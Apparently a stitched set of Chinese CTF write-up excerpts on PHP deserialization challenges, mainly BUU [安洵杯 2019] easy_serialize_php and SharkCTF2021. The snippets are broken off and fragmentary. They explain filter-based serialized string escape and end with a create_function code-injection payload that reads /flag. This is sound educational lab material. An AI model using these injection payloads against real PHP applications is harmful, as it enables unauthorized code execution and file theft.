由此可得session值可以控制,(比如后面要控制的 $_SESSION["img"]="payload" ) 三、由下图可得: 序列化 $_SESSION =》filter过滤函数 =》反序列化 =》base64解密文件名(例子:$username['img']="base64加密后的d0g3_f1ag.php") 综上所述:需要先对 d0g3_f1ag.php 加密,然后赋值给 $_SESSION['img']...
}if(!$_GET['img_path']){$_SESSION['img'] =base64_encode('guest_img.png');#对ing的值进行base64加密}else{$_SESSION['img'] =sha1(base64_encode($_GET['img_path']));#对img的值进行base64加密和sha1加密}$serialize_info= filter(serialize($_SESSION));#将$_SESSION序列化并过滤if($f...
$s=serialize($str); print($s); //a:3:{s:4:"a123";s:16:"flagflagflagflag";s:1:"a";s:40:"";s:1:"c";s:2:"12";s:1:"t";s:3:"125";}as";s:1:"b";s:3:"456";} echo "\n"; $s1=preg_replace("/flag/","",$s); //a:3:{s:4:"a123";s:16:"";s:1:"a...
将_SESSION序列化且过滤,将值赋给$serialize_info 当get传入的f的值,也就是$function的值等于'show_image'时,就会将$serialize_info反序列化,然后将值赋给$userinfo['img']指向的文件(base64解密后) 最后将会高亮userin 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 总体 我们主要用到的就这...
https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php 一眼反序列化,首先是源码解析: 这里分一下类方便快速理解: 应该是flag.php这里我自己找到了没截图所以搜索的auto,我看其他大佬wp里面直接搜索的auto,没去深究,有其深意大伙可以评论区教教,第二点:我们想要得到flag肯...
简介:BUU [安洵杯 2019]easy_serialize_php BUU [安洵杯 2019]easy_serialize_php 源码如下 <?php$function = @$_GET['f'];function filter($img){$filter_arr = array('php','flag','php5','php4','fl1g');$filter = '/'.implode('|',$filter_arr).'/i';return preg_replace($filter,'',...
<?php $_SESSION["user"]='*';$_SESSION['function']='**';$_SESSION['img']=base64_encode('guest_img.png');echoserialize($_SESSION);//a:3:{s:4:"user";s:1:"*";s:8:"function";s:2:"**";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";} ...
SharkCTF2021 easy_phpserialize题记 ***先说教训: (1)不要看到正则就走不动路;有些正则不一定能绕。 (2)__wakeup()漏洞在php5.6以上就被修复了; 本地复现各种题目时要注意环境。 ——— 扫描,得到index.php~中源码;得知flag.php存在。 从底下看起...
<?php class User{ public $var1; public function __get($arg1) { echo $arg1; } } $test = new User(); $test->woshiyigezifuchuan; ?> User类里面是没有woshiyigezifuchuan这个属性或者方法的,所以会调用User类里面的__get魔术方法,$arg1是什么呢?
php class Noteasy { private $a; private $b; public function __construct($a, $b) { $this->a = $a; $this->b = $b; } } $a=new Noteasy("create_function",';};highlight_file("/flag");/*'); echo urlencode(serialize($a)); 在浏览器中构造GET请求,即可拿到flag...